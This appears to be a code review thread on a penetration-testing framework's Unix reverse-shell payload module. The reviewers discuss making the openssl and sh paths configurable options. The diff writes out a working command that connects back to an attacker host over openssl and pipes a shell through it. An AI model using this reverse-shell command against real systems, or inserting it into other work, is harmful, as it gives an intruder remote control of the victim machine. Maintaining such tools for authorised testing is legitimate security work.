modules/payloads/singles/cmd/unix/reverse_openssl.rb

```diff
@@ -45,9 +50,9 @@ def generate(_opts = {})
   def command_string
     cmd =
       "sh -c '(sleep #{3600+rand(1024)}|" +
-      "openssl s_client -quiet -connect #{datastore['LHOST']}:#{datastore['LPORT']}|" +
+      "#{datastore['OpenSSLPath']} s_client -quiet -connect #{datastore['LHOST']}:#{datastore['LPORT']}|" +
       "while : ; do sh && break; done 2>&1|" +
-      "openssl s_client -quiet -connect #{datastore['LHOST']}:#{datastore['LPORT']}" +
+      "#{datastore['OpenSSLPath']} s_client -quiet -connect #{datastore['LHOST']}:#{datastore['LPORT']}" +
       " >/dev/null 2>&1 &)'"
```

Comment:
This may also need updates for the `sh` command? Highly unlikely its ever encountered but something to consider.

Reply:
What should the description for `sh` be as `/bin/sh` is the path to the system shell

Reply:
Not sure if this is necessary. The option name should be `SHELL` or `SHELL_PATH`.

Although if it's an advanced option, then perhaps `ShellPath`.

Reply:
@bcoles then the value for `/bin/sh` will be?
@gwillcox-r7 mentioned that hardcoded `/bin/sh` could be add as a datastore option.

Reply:
The value for `/bin/sh` will be `/bin/sh`.

Reply:
Sorry not the value but path ?
For eg: SHELL_PATH for `sh` as you mentioned

Reply:
The path should remain unchanged to ensure consistency.

If the payload module currently uses `sh` then the default value should be `sh`.

if the payload module currently uses `/bin/sh` then the default value should be `/bin/sh`.